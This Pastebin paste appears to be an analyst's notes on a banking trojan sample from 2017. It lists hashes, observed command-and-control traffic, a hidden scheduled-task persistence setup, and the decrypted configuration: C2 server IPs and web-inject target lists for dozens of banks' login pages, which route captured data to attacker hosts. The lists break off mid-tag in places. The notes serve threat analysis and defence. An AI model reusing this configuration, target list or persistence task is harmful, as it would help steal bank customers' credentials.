API tools faq
paste
Advertisement
Guest User

UntitLed

a guest
Aug 6th, 2017
18,332
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
XML 19.68 KB | None | 0 0
raw download clone embed print report
  1. Hashes :
  2. malware.exe     : bda9ea15da9a520513276b709c26d822 
  3. compiler-stamp  : (Fri Aug 04 08:39:27 2017)
  4.  
  5. Loc: %Roaming%\winapp\
  6. client_id       : c9f921548796ca07a51c77aa61486f27     
  7. group_tag       : 8a28cb8da1ce9c1e0a91df18f99ed36e 
  8. injectDll64     : 803842eeb83b6d8618fcb59c0d490867 
  9. systeminfo64    : b06b375b380e769d563fe37d9f3e2e59
  10. dinj            : 41fe74239746ba40f2f64ec8d811e9a2 
  11. dpost           : f762c88e05cb6a8cf8f76426964a94c7 
  12. sinj            : 4a698f7b4b7fe49ad901fdb775808bdb 
  13.  
  14. PDB :
  15. C:\Work\Sharn\GetSystemInfo_solution\x64\Release\GetSystemInfo.pdb
  16.  
  17. Traffic Observed :
  18. https://195.88.208.193/tt0002/
  19. 186.103.161.204/tt0002/ComputerName.ID/Number/NAT%20status/client%20is%20behind%20NAT/0/ ; I am the one who NATs ... sorry, couldn't resist
  20. https://186.103.161.204/tt0002/ComputerName.ID/Number/systeminfo/GetSystemInfo/c3VjY2Vzcw==/systeminfo/ ; c3VjY2Vzcw== = success
  21. https://195.88.208.202:447/tt0002/ComputerName.ID/Number/injectDll64/
  22.  
  23.  
  24. Persistence :
  25. Created a scheduled task <services update>from the time of infection to start %roamind%\winapp\malware(whatever it's called here).exe
  26. - At log on of <username>
  27. - Daily @ whatever time you were initially infected : if this time is missed, start task asap option is selected  
  28. - If instance is already running, don't start another one
  29.  
  30.  
  31. Config :
  32.  
  33. <mcconf>
  34. <ver>1000032</ver>
  35. <gtag>tt0002</gtag>
  36. <servs>
  37. <srv>186.103.161.204:443</srv>
  38. <srv>191.7.30.30:443</srv>
  39. <srv>46.160.165.31:443</srv>
  40. <srv>84.238.198.166:449</srv>
  41. <srv>194.87.236.184:443</srv>
  42. <srv>151.80.84.15:443</srv>
  43. <srv>23.95.9.152:443</srv>
  44. <srv>31.220.55.47:443</srv>
  45. <srv>210.16.101.59:443</srv>
  46. <srv>64.15.75.78:443</srv>
  47. <srv>195.62.52.107:443</srv>
  48. <srv>195.88.208.193:443</srv>
  49. <srv>194.87.146.113:443</srv>
  50. <srv>194.87.92.199:443</srv>
  51. <srv>195.133.146.77:443</srv>
  52. <srv>185.82.218.117:443</srv>
  53. <srv>23.95.114.233:443</srv>
  54. </servs>
  55. <autorun>
  56. <module name="systeminfo" ctl="GetSystemInfo"/>
  57. <module name="injectDll"/>
  58. </autorun>
  59. </mcconf>
  60.  
  61. <moduleconfig>
  62.   <autostart>yes</autostart>
  63.   <sys>yes</sys>
  64.   <needinfo name="id"/>
  65.   <needinfo name="ip"/>
  66.   <autoconf>
  67.     <conf ctl="dinj" file="dinj" period="20"/>
  68.     <conf ctl="sinj" file="sinj" period="20"/>
  69.     <conf ctl="dpost" file="dpost" period="60"/>
  70.   </autoconf>
  71. </moduleconfig>
  72.  
  73. Target_List:
  74.  
  75. <igroup>
  76. <dinj>
  77. <lm>*/Authentication/Login*</lm>
  78. <hl>http://162.220.162.140/response.php</hl>
  79. <pri>100</pri>
  80. <sq>2</sq>
  81. </dinj>
  82. <dinj>
  83. <lm>*/Accounts/AccountOverview.asp*</lm>
  84. <hl>http://162.220.162.140/response.php</hl>
  85. <pri>100</pri>
  86. <sq>2</sq>
  87. </dinj>
  88. </igroup>
  89. <igroup>
  90. <dinj>
  91. <lm>*cey-ebanking.com/CLKCCM/*</lm>
  92. <hl>http://162.220.162.140/response.php</hl>
  93. <pri>100</pri>
  94. <sq>2</sq>
  95. <ignore_mask>*.gif*</ignore_mask>
  96. <ignore_mask>*.jpg*</ignore_mask>
  97. <ignore_mask>*.png*</ignore_mask>
  98. <ignore_mask>*.js*</ignore_mask>
  99. <ignore_mask>*.css*</ignore_mask>
  100. <require_header>*text/html*</require_header>
  101. </dinj>
  102. </igroup>
  103. <igroup>
  104. <dinj>
  105. <lm>*engine/login/businesslogin*</lm>
  106. <hl>http://162.220.162.140/response.php</hl>
  107. <pri>100</pri>
  108. <sq>2</sq>
  109. <ignore_mask>*.gif*</ignore_mask>
  110. <ignore_mask>*.jpg*</ignore_mask>
  111. <ignore_mask>*.png*</ignore_mask>
  112. <ignore_mask>*.js*</ignore_mask>
  113. <ignore_mask>*.css*</ignore_mask>
  114. <require_header>*text/html*</require_header>
  115. </dinj>
  116. </igroup>
  117. <igroup>
  118. <dinj>
  119. <lm>*bancofarnet.bancofar.es/*/*</lm>
  120. <hl>http://162.220.162.140/response.php</hl>
  121. <pri>100</pri>
  122. <sq>2</sq>
  123. <ignore_mask>*.gif*</ignore_mask>
  124. <ignore_mask>*.jpg*</ignore_mask>
  125. <ignore_mask>*.png*</ignore_mask>
  126. <ignore_mask>*.js*</ignore_mask>
  127. <ignore_mask>*.css*</ignore_mask>
  128. <require_header>*text/html*</require_header>
  129. </dinj>
  130. <dinj>
  131. <lm>*bancofarnet.bancofar.es/favicon.ico?*</lm>
  132. <hl>http://162.220.162.140/response.php</hl>
  133. <pri>100</pri>
  134. <sq>2</sq>
  135. </dinj>
  136. </igroup>
  137. <igroup>
  138. <dinj>
  139. <lm>*unicaja*es*/PortalServle*</lm>
  140. <hl>http://162.220.162.140/response.php</hl>
  141. <pri>100</pri>
  142. <sq>2</sq>
  143. <ignore_mask>*.gif*</ignore_mask>
  144. <ignore_mask>*.jpg*</ignore_mask>
  145. <ignore_mask>*.png*</ignore_mask>
  146. <ignore_mask>*.js*</ignore_mask>
  147. <ignore_mask>*.css*</ignore_mask>
  148. <require_header>*text/html*</require_header>
  149. </dinj>
  150. <dinj>
  151. <lm>*unicaja*es*/favicon.ico*</lm>
  152. <hl>http://162.220.162.140/response.php</hl>
  153. <pri>100</pri>
  154. <sq>2</sq>
  155. </dinj>
  156. </igroup>
  157. <igroup>
  158. <dinj>
  159. <lm>*netteller.com/login2008/Authentication*</lm>
  160. <hl>http://162.220.162.140/response.php</hl>
  161. <pri>100</pri>
  162. <sq>2</sq>
  163. </dinj>
  164. <dinj>
  165. <lm>https://*.netteller.com/favicon.ico?*</lm>
  166. <hl>http://162.220.162.140/response.php</hl>
  167. <pri>100</pri>
  168. <sq>2</sq>
  169. </dinj>
  170. </igroup>
  171. <igroup>
  172. <dinj>
  173. <lm>*/isum/Main?ISUM_SCR=login&loginType=accesoSeguro&ISUM_Portal*</lm>
  174. <hl>http://162.220.162.140/response.php</hl>
  175. <pri>100</pri>
  176. <sq>2</sq>
  177. <ignore_mask>*.gif*</ignore_mask>
  178. <ignore_mask>*.jpg*</ignore_mask>
  179. <ignore_mask>*.png*</ignore_mask>
  180. <ignore_mask>*.js*</ignore_mask>
  181. <ignore_mask>*.css*</ignore_mask>
  182. <require_header>*text/html*</require_header>
  183. </dinj>
  184. </igroup>
  185. <igroup>
  186. <dinj>
  187. <lm>*/business/j_security_check*</lm>
  188. <hl>http://162.220.162.140/response.php</hl>
  189. <pri>100</pri>
  190. <sq>2</sq>
  191. </dinj>
  192. <dinj>
  193. <lm>*/business/login/Login.jsp*</lm>
  194. <hl>http://162.220.162.140/response.php</hl>
  195. <pri>100</pri>
  196. <sq>2</sq>
  197. </dinj>
  198. <dinj>
  199. <lm>*/business/cts_security_precheck*</lm>
  200. <hl>http://162.220.162.140/response.php</hl>
  201. <pri>100</pri>
  202. <sq>2</sq>
  203. </dinj>
  204. <dinj>
  205. <lm>https://secure.*/LookAndFeel/Common/images/common/share.png?favicon.ico*</lm>
  206. <hl>http://162.220.162.140/response.php</hl>
  207. <pri>100</pri>
  208. <sq>2</sq>
  209. </dinj>
  210. </igroup>
  211. <igroup>
  212. <dinj>
  213. <lm>*.com/pub/html/login.html*</lm>
  214. <hl>http://162.220.162.140/response.php</hl>
  215. <pri>100</pri>
  216. <sq>2</sq>
  217. </dinj>
  218. <dinj>
  219. <lm>*.com/pub/html/favicon.ico*</lm>
  220. <hl>http://162.220.162.140/response.php</hl>
  221. <pri>100</pri>
  222. <sq>2</sq>
  223. </dinj>
  224. </igroup>
  225. <igroup>
  226. <dinj>
  227. <lm>*/outil/UAUT*</lm>
  228. <hl>http://162.220.162.140/response.php</hl>
  229. <pri>100</pri>
  230. <sq>2</sq>
  231. <ignore_mask>*.gif*</ignore_mask>
  232. <ignore_mask>*.jpg*</ignore_mask>
  233. <ignore_mask>*.png*</ignore_mask>
  234. <ignore_mask>*.js*</ignore_mask>
  235. <ignore_mask>*.css*</ignore_mask>
  236. <require_header>*text/html*</require_header>
  237. </dinj>
  238. </igroup>
  239. <igroup>
  240. <dinj>
  241. <lm>https://www.creditmutuel.fr/*/*</lm>
  242. <hl>http://162.220.162.140/response.php</hl>
  243. <pri>100</pri>
  244. <sq>2</sq>
  245. <ignore_mask>*.gif*</ignore_mask>
  246. <ignore_mask>*.jpg*</ignore_mask>
  247. <ignore_mask>*.png*</ignore_mask>
  248. <ignore_mask>*.js*</ignore_mask>
  249. <ignore_mask>*.css*</ignore_mask>
  250. <require_header>*text/html*</require_header>
  251. </dinj>
  252. <dinj>
  253. <lm>https://www.creditmutuel.fr/favicon.ico*</lm>
  254. <hl>http://162.220.162.140/response.php</hl>
  255. <pri>100</pri>
  256. <sq>2</sq>
  257. </dinj>
  258. </igroup>
  259. <igroup>
  260. <dinj>
  261. <lm>https://entreprises.secure.societegenerale.fr/</lm>
  262. <hl>http://162.220.162.140/response.php</hl>
  263. <pri>100</pri>
  264. <sq>2</sq>
  265. </dinj>
  266. <dinj>
  267. <lm>https://entreprises.secure.societegenerale.fr/*.html</lm>
  268. <hl>http://162.220.162.140/response.php</hl>
  269. <pri>100</pri>
  270. <sq>2</sq>
  271. <ignore_mask>*.gif*</ignore_mask>
  272. <ignore_mask>*.jpg*</ignore_mask>
  273. <ignore_mask>*.png*</ignore_mask>
  274. <ignore_mask>*.js*</ignore_mask>
  275. <ignore_mask>*.css*</ignore_mask>
  276. <require_header>*text/html*</require_header>
  277. </dinj>
  278. <dinj>
  279. <lm>https://entreprises.secure.societegenerale.fr/favicon.ico?*</lm>
  280. <hl>http://162.220.162.140/response.php</hl>
  281. <pri>100</pri>
  282. <sq>2</sq>
  283. </dinj>
  284. </igroup>
  285. <igroup>
  286. <dinj>
  287. <lm>*entreprises.natixis.com/jcms*</lm>
  288. <hl>http://162.220.162.140/response.php</hl>
  289. <pri>100</pri>
  290. <sq>2</sq>
  291. <ignore_mask>*.gif*</ignore_mask>
  292. <ignore_mask>*.jpg*</ignore_mask>
  293. <ignore_mask>*.png*</ignore_mask>
  294. <ignore_mask>*.js*</ignore_mask>
  295. <ignore_mask>*.css*</ignore_mask>
  296. <require_header>*text/html*</require_header>
  297. </dinj>
  298. <dinj>
  299. <lm>*entreprises.natixis.com/favicon.ico*</lm>
  300. <hl>http://162.220.162.140/response.php</hl>
  301. <pri>100</pri>
  302. <sq>2</sq>
  303. </dinj>
  304. </igroup>
  305. <igroup>
  306. <dinj>
  307. <lm>https://www.icgauth.banquepopulaire.fr/WebSSO_BP/_*html*</lm>
  308. <hl>http://162.220.162.140/response.php</hl>
  309. <pri>100</pri>
  310. <sq>2</sq>
  311. <ignore_mask>*.gif*</ignore_mask>
  312. <ignore_mask>*.jpg*</ignore_mask>
  313. <ignore_mask>*.png*</ignore_mask>
  314. <ignore_mask>*.js*</ignore_mask>
  315. <ignore_mask>*.css*</ignore_mask>
  316. <require_header>*text/html*</require_header>
  317. </dinj>
  318. <dinj>
  319. <lm>https://*banquepopulaire.fr*asp*</lm>
  320. <hl>http://162.220.162.140/response.php</hl>
  321. <pri>100</pri>
  322. <sq>2</sq>
  323. <ignore_mask>*.gif*</ignore_mask>
  324. <ignore_mask>*.jpg*</ignore_mask>
  325. <ignore_mask>*.png*</ignore_mask>
  326. <ignore_mask>*.js*</ignore_mask>
  327. <ignore_mask>*.css*</ignore_mask>
  328. <require_header>*text/html*</require_header>
  329. </dinj>
  330. <dinj>
  331. <lm>https://*banquepopulaire.fr/favicon.ico?*</lm>
  332. <hl>http://162.220.162.140/response.php</hl>
  333. <pri>100</pri>
  334. <sq>2</sq>
  335. </dinj>
  336. </igroup>
  337. <igroup>
  338. <dinj>
  339. <lm>*cajasur.es/*/*</lm>
  340. <hl>http://162.220.162.140/response.php</hl>
  341. <pri>100</pri>
  342. <sq>2</sq>
  343. <ignore_mask>*.gif*</ignore_mask>
  344. <ignore_mask>*.jpg*</ignore_mask>
  345. <ignore_mask>*.png*</ignore_mask>
  346. <ignore_mask>*.js*</ignore_mask>
  347. <ignore_mask>*.css*</ignore_mask>
  348. <require_header>*text/html*</require_header>
  349. </dinj>
  350. <dinj>
  351. <lm>*kutxabank.es/*/*</lm>
  352. <hl>http://162.220.162.140/response.php</hl>
  353. <pri>100</pri>
  354. <sq>2</sq>
  355. <ignore_mask>*.gif*</ignore_mask>
  356. <ignore_mask>*.jpg*</ignore_mask>
  357. <ignore_mask>*.png*</ignore_mask>
  358. <ignore_mask>*.js*</ignore_mask>
  359. <ignore_mask>*.css*</ignore_mask>
  360. <require_header>*text/html*</require_header>
  361. </dinj>
  362. <dinj>
  363. <lm>*cajasur.es/favicon.ico*</lm>
  364. <hl>http://162.220.162.140/response.php</hl>
  365. <pri>100</pri>
  366. <sq>2</sq>
  367. </dinj>
  368. <dinj>
  369. <lm>*kutxabank.es/favicon.ico*</lm>
  370. <hl>http://162.220.162.140/response.php</hl>
  371. <pri>100</pri>
  372. <sq>2</sq>
  373. </dinj>
  374. </igroup>
  375. <igroup>
  376. <dinj>
  377. <lm>https://www.caja-ingenieros.es/*/*</lm>
  378. <hl>http://162.220.162.140/response.php</hl>
  379. <pri>100</pri>
  380. <sq>2</sq>
  381. <ignore_mask>*.gif*</ignore_mask>
  382. <ignore_mask>*.jpg*</ignore_mask>
  383. <ignore_mask>*.png*</ignore_mask>
  384. <ignore_mask>*.js*</ignore_mask>
  385. <ignore_mask>*.css*</ignore_mask>
  386. <require_header>*text/html*</require_header>
  387. </dinj>
  388. <dinj>
  389. <lm>https://www.caja-ingenieros.es/favicon.ico?*</lm>
  390. <hl>http://162.220.162.140/response.php</hl>
  391. <pri>100</pri>
  392. <sq>2</sq>
  393. </dinj>
  394. <dinj>
  395. <lm>https://be.caja-ingenieros.es/BEWeb/3025/6025/*</lm>
  396. <hl>http://162.220.162.140/response.php</hl>
  397. <pri>100</pri>
  398. <sq>2</sq>
  399. <ign
  400. <slist>
  401. <sinj>
  402. <mm>https://www.bankline.natwest.com*</mm>
  403. <sm>https://www.bankline.natwest.com/CWSLogon/logon.do*</sm>
  404. <nh>ccsarewkpsmofyibdhqcgvnltzxj.net</nh>
  405. <srv>192.99.113.67:443</srv>
  406. </sinj>
  407. <sinj>
  408. <mm>https://www.bankline.rbs.com*</mm>
  409. <sm>https://www.bankline.rbs.com/CWSLogon/logon.do*</sm>
  410. <nh>cdsarpwtfdxysnmgejvzbicolqku.net</nh>
  411. <srv>192.99.113.67:443</srv>
  412. </sinj>
  413. <sinj>
  414. <mm>https://www.business.hsbc.co.uk*</mm>
  415. <sm>https://www.business.hsbc.co.uk*</sm>
  416. <nh>crsavugwrictqdmkhxnjfzlsyeoa.net</nh>
  417. <srv>192.99.113.67:443</srv>
  418. </sinj>
  419. <sinj>
  420. <mm>https://www.nwolb.com*</mm>
  421. <sm>https://www.nwolb.com/default.aspx*</sm>
  422. <nh>cqsauvfqrkchbptxelozmsdyainj.net</nh>
  423. <url404>*/ServiceManagement/GenericErrorPageNoMenu.aspx?ErrorPage=PNF*</url404>
  424. <srv>192.99.113.67:443</srv>
  425. </sinj>
  426. <sinj>
  427. <mm>https://www6.rbc.com*</mm>
  428. <sm>https://www6.rbc.com/webapp/ukv0/signin/logon.xhtml*</sm>
  429. <nh>chsaryoxijedlfktmvupsbqzcwgh.net</nh>
  430. <srv>192.99.113.67:443</srv>
  431. </sinj>
  432. <sinj>
  433. <mm>https://www.rbsdigital.com*</mm>
  434. <sm>https://www.rbsdigital.com/default.aspx*</sm>
  435. <nh>cksadrwyqvgokpitzunjhfslamex.net</nh>
  436. <srv>192.99.113.67:443</srv>
  437. </sinj>
  438. <sinj>
  439. <mm>https://lloydslink.online.lloydsbank.com*</mm>
  440. <sm>https://lloydslink.online.lloydsbank.com/Logon*</sm>
  441. <nh>dcsadhevyqfzwmcnsiobtpjkalrg.net</nh>
  442. <srv>192.99.113.67:443</srv>
  443. </sinj>
  444. <sinj>
  445. <mm>https://www.ulsterbankanytimebanking.ie*</mm>
  446. <sm>https://www.ulsterbankanytimebanking.ie/default.aspx*</sm>
  447. <nh>ddsamcpfbxhavswtquzjgiykelnd.net</nh>
  448. <url404>/ServiceManagement/GenericErrorPageNoMenu.aspx?ErrorPage=PNF</url404>
  449. <srv>192.99.113.67:443</srv>
  450. </sinj>
  451. <sinj>
  452. <mm>https://banking.bankofscotland.co.uk*</mm>
  453. <sm>https://banking.bankofscotland.co.uk/Logon*</sm>
  454. <nh>dbsajondmzrvtqkflybcseipuawg.net</nh>
  455. <srv>192.99.113.67:443</srv>
  456. </sinj>
  457. <sinj>
  458. <mm>https://businessbanking*.tdcommercialbanking.com*</mm>
  459. <sm>https://businessbanking*.tdcommercialbanking.com/WBB/Login*</sm>
  460. <nh>basabroxpcnqfdteyhazwlgmvsji.net</nh>
  461. <srv>192.99.113.67:443</srv>
  462. </sinj>
  463. <sinj>
  464. <mm>https://online-business.bankofscotland.co.uk*</mm>
  465. <sm>https://online-business.bankofscotland.co.uk/business*</sm>
  466. <nh>bcsaqnrhsiztfouvcdmpklwabgje.net</nh>
  467. <srv>192.99.113.67:443</srv>
  468. </sinj>
  469. <sinj>
  470. <mm>https://transtasman.online.anz.com*</mm>
  471. <sm>https://transtasman.online.anz.com/client*</sm>
  472. <nh>rqsccqwzhiksmjuefrlxptbogvyd.net</nh>
  473. <srv>192.99.113.67:443</srv>
  474. </sinj>
  475. <sinj>
  476. <mm>https://www.anzdirect.co.nz*</mm>
  477. <sm>https://www.anzdirect.co.nz/online/EnterANZDirect.do*</sm>
  478. <nh>rhscjefivzbwxdprlhksnmoqcgay.net</nh>
  479. <srv>192.99.113.67:443</srv>
  480. </sinj>
  481. <sinj>
  482. <mm>https://online.coutts.com*</mm>
  483. <sm>https://online.coutts.com/eBankingCouttsLogin/login*</sm>
  484. <nh>qasaswzlpmdufjxevhociqngybrt.net</nh>
  485. <url404>*/error_path/404.html*</url404>
  486. <srv>192.99.113.67:443</srv>
  487. </sinj>
  488. <sinj>
  489. <mm>https://business.co-operativebank.co.uk*</mm>
  490. <sm>https://business.co-operativebank.co.uk/corp/*</sm>
  491. <nh>qcsavktmfwlsohxunbzdcerpgaqi.net</nh>
  492. <srv>192.99.113.67:443</srv>
  493. </sinj>
  494. <sinj>
  495. <mm>https://fdonline.co-operativebank.co.uk*</mm>
  496. <sm>https://fdonline.co-operativebank.co.uk/corp*</sm>
  497. <nh>hbsabvronpckthldjquyaigsfmez.net</nh>
  498. <srv>192.99.113.67:443</srv>
  499. </sinj>
  500. <sinj>
  501. <mm>https://corporate.metrobankonline.co.uk*</mm>
  502. <sm>https://corporate.metrobankonline.co.uk/servlet/BrowserServlet*</sm>
  503. <nh>bosaxblkqnivecuwaygptrzfmshd.com</nh>
  504. <srv>192.99.113.67:443</srv>
  505. </sinj>
  506. <sinj>
  507. <mm>https://www2?.bmo.com*</mm>
  508. <sm>https://www2?.bmo.com/ctpauth/CTPEAILogin/CustUserPasswordAuthServlet?TAM_OP=login*</sm>
  509. <nh>bosdhymixgdkzqrabfctswelopvj.org</nh>
  510. <url404>https://www2?.bmo.com/ctpauth/CTPEAILogin/CustUserPasswordAuthServlet?TAM_OP=login?ERROR_CODE=0x00000000*</url404>
  511. <srv>192.99.113.67:443</srv>
  512. </sinj>
  513. <sinj>
  514. <mm>https://www.onlinebanking.iombank.com*</mm>
  515. <sm>https://www.onlinebanking.iombank.com/default.aspx*</sm>
  516. <nh>kdsawblqdhtngzmuksyiaxjefcro.net</nh>
  517. <srv>192.99.113.67:443</srv>
  518. </sinj>
  519. <sinj>
  520. <mm>https://bank.barclays.co.uk*</mm>
  521. <sm>https://bank.barclays.co.uk/olb/auth/LoginLink.action*</sm>
  522. <nh>kbsavjthsyofzqnpburdxgciweam.net</nh>
  523. <srv>192.99.113.67:443</srv>
  524. </sinj>
  525. <sinj>
  526. <mm>https://corporate.santander.co.uk*</mm>
  527. <sm>https://corporate.santander.co.uk/LOGSCU_NS_ENS*</sm>
  528. <nh>obsamphtznlewckfbauqgvsrodxy.com</nh>
  529. <srv>192.99.113.67:443</srv>
  530. </sinj>
  531. <sinj>
  532. <mm>https://leumionline.bankleumi.co.uk*</mm>
  533. <sm>https://leumionline.bankleumi.co.uk*</sm>
  534. <nh>ohsaotjprgfakvxwulnyqzdsechm.com</nh>
  535. <url404>/my.policy</url404>
  536. <srv>192.99.113.67:443</srv>
  537. </sinj>
  538. <sinj>
  539. <mm>https://onlinebusiness.lloydsbank.co.uk*</mm>
  540. <sm>https://onlinebusiness.lloydsbank.co.uk/business*</sm>
  541. <nh>absadbagplqcmskyjntuewxhzvfo.com</nh>
  542. <srv>192.99.113.67:443</srv>
  543. </sinj>
  544. <sinj>
  545. <mm>https://s2b.standardchartered.com*</mm>
  546. <sm>https://s2b.standardchartered.com/ssoapp/login.jsp*</sm>
  547. <nh>rdsamhxbjqfidyonavurlgtzwkes.com</nh>
  548. <srv>192.99.113.67:443</srv>
  549. </sinj>
  550. <sinj>
  551. <mm>https://cmo.cibc.com*</mm>
  552. <sm>https://cmo.cibc.com*</sm>
  553. <nh>cdsaskoevwfubrtjgyqmnizcalhx.org</nh>
  554. <srv>192.99.113.67:443</srv>
  555. </sinj>
  556. <sinj>
  557. <mm>https://www.anztransactive.anz.com*</mm>
  558. <sm>https://www.anztransactive.anz.com/*</sm>
  559. <nh>rcsamanqryvkdfjoblezxtiwsuhc.org</nh>
  560. <srv>192.99.113.67:443</srv>
  561. </sinj>
  562. <sinj>
  563. <mm>https://bbonline.banksa.com.au*</mm>
  564. <sm>https://bbonline.banksa.com.au/html/cbank.asp*</sm>
  565. <nh>rrsalxeyfboznkgajwvspmturqdh.org</nh>
  566. <srv>192.99.113.67:443</srv>
  567. </sinj>
  568. <sinj>
  569. <mm>https://ibs.bankwest.com.au*</mm>
  570. <sm>https://ibs.bankwest.com.au/BWLogin/rib.aspx*</sm>
  571. <nh>rqsaceayxbnfhvuqdswplmkzjtoi.org</nh>
  572. <srv>192.99.113.67:443</srv>
  573. </sinj>
  574. <sinj>
  575. <mm>https://netteller2.tsw.com.au*</mm>
  576. <sm>https://netteller2.tsw.com.au/delphi/ntv451.asp*</sm>
  577. <nh>rhsaevfyuirhsbnzakxpdtlmocgq.org</nh>
  578. <srv>192.99.113.67:443</srv>
  579. </sinj>
  580. <sinj>
  581. <mm>https://businessonline.westpac.com.au*</mm>
  582. <sm>https://businessonline.westpac.com.au/esis/Login/SrvPage*</sm>
  583. <nh>rssamvybridtxocunwpaqlhzgefs.org</nh>
  584. <srv>192.99.113.67:443</srv>
  585. </sinj>
  586. <sinj>
  587. <mm>https://online.corp.westpac.com.au*</mm>
  588. <sm>https://online.corp.westpac.com.au/*</sm>
  589. <nh>rksalhodzprnvuqxsfgmkyeictja.org</nh>
  590. <srv>192.99.113.67:443</srv>
  591. </sinj>
  592. <sinj>
  593. <mm>https://www?.my.commbiz.commbank.com.au*</mm>
  594. <sm>https://www?.my.commbiz.commbank.com.au/Logon/UserMaintenance/Login.aspx*</sm>
  595. <nh>qosaxuavegqkomtyndjzcbplhisw.org</nh>
  596. <srv>192.99.113.67:443</srv>
  597. </sinj>
  598. <sinj>
  599. <mm>https://bbonline.bankofmelbourne.com.au*</mm>
  600. <sm>https://bbonline.bankofmelbourne.com.au/html/login.aspx*</sm>
  601. <nh>qasasidoqpfhrgwykvanutzxcelj.org</nh>
  602. <srv>192.99.113.67:443</srv>
  603. </sinj>
  604. <sinj>
  605. <mm>https://banking.lloydsbank.com*</mm>
  606. <sm>https://banking.lloydsbank.com/Logon*</sm>
  607. <nh>qrsacdptvluyojmafikzrxwhgbqn.org</nh>
  608. <srv>192.99.113.67:443</srv>
  609. </sinj>
  610. <sinj>
  611. <mm>https://bank.ruralbank.com.au*</mm>
  612. <sm>https://bank.ruralbank.com.au/banking/RBLIBanking*</sm>
  613. <nh>qhsarqofnjsehzibcgvxmykapwul.org</nh>
  614. <srv>192.99.113.67:443</srv>
  615. </sinj>
  616. <sinj>
  617. <mm>https://nabconnect*.nab.com.au*</mm>
  618. <sm>https://nabconnect*.nab.com.au/auth/nabclogin/login.do*</sm>
  619. <nh>qksaiwgxsdkcmtqrhynvbopzaejf.org</nh>
  620. <srv>192.99.113.67:443</srv>
  621. </sinj>
  622. <sinj>
  623. <mm>https://ib.tmbank.com.au*</mm>
  624. <sm>https://ib.tmbank.com.au/ib/signon/Login.aspx*</sm>
  625. <nh>hosajempfozwnqlxgcbrdthivuas.org</nh>
  626. <srv>192.99.113.67:443</srv>
  627. </sinj>
  628. <sinj>
  629. <mm>https://digital.defencebank.com.au*</mm>
  630. <sm>https://digital.defencebank.com.au*</sm>
  631. <nh>hbsajlhrugctfpyavoqmwnbedkzi.org</nh>
  632. <srv>192.99.113.67:443</srv>
  633. </sinj>
  634. <sinj>
  635. <mm>https://velocity.ocbc.com*</mm>
  636. <sm>https://velocity.ocbc.com/portal.view*</sm>
  637. <nh>hksazewovfilhjutxcmdybsqkang.org</nh>
  638. <srv>192.99.113.67:443</srv>
  639. </sinj>
  640. <sinj>
  641. <mm>https://uniservices2.uobgroup.com*</mm>
  642. <sm>https://uniservices2.uobgroup.com/ELO/login.jsp*</sm>
  643. <nh>sosanehiqtckfxzrdjglsomvubay.org</nh>
  644. <srv>192.99.113.67:443</srv>
  645. </sinj>
  646. <sinj>
  647. <mm>https://sg.bibplus.uobgroup.com*</mm>
  648. <sm>https://sg.bibplus.uobgroup.com/BIB/public*</sm>
  649. <nh
  650.  
  651.  
  652.  
  653. Task :
  654.  
  655. <UserId>ComputerName\UserName</UserId>
  656. </LogonTrigger>
  657. <CalendarTrigger>
  658. <Repetition>
  659. <Interval>PT3M</Interval>
  660. <Duration>P1D</Duration>
  661. <StopAtDurationEnd>false</StopAtDurationEnd>
  662. </Repetition>
  663. <StartBoundary>2017-08-06T08:30:10</StartBoundary>
  664. <Enabled>true</Enabled>
  665. <ScheduleByDay>
  666. <DaysInterval>1</DaysInterval>
  667. </ScheduleByDay>
  668. </CalendarTrigger>
  669. </Triggers>
  670. <Principals>
  671. <Principal id="Author">
  672. <LogonType>InteractiveToken</LogonType>
  673. <RunLevel>LeastPrivilege</RunLevel>
  674. <UserId>COMPUTERNAME\USERID</UserId>
  675. </Principal>
  676. </Principals>
  677. <Settings>
  678. <MultipleInstancesPolicy>IgnoreNew</MultipleInstancesPolicy>
  679. <DisallowStartIfOnBatteries>false</DisallowStartIfOnBatteries>
  680. <StopIfGoingOnBatteries>false</StopIfGoingOnBatteries>
  681. <AllowHardTerminate>false</AllowHardTerminate>
  682. <StartWhenAvailable>true</StartWhenAvailable>
  683. <RunOnlyIfNetworkAvailable>false</RunOnlyIfNetworkAvailable>
  684. <IdleSettings>
  685. <StopOnIdleEnd>true</StopOnIdleEnd>
  686. <RestartOnIdle>false</RestartOnIdle>
  687. </IdleSettings>
  688. <AllowStartOnDemand>true</AllowStartOnDemand>
  689. <Enabled>true</Enabled>
  690. <Hidden>true</Hidden>
  691. <RunOnlyIfIdle>false</RunOnlyIfIdle>
  692. <WakeToRun>false</WakeToRun>
  693. <ExecutionTimeLimit>PT0S</ExecutionTimeLimit>
  694. <Priority>7</Priority>
  695. </Settings>
  696. <Actions Context="Author">
  697. <Exec>
  698. <Command>C:\Users\USERNAME\AppData\Roaming\winapp\malware.exe</Command>
  699. </Exec>
  700. </Actions>
  701. </Task>
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!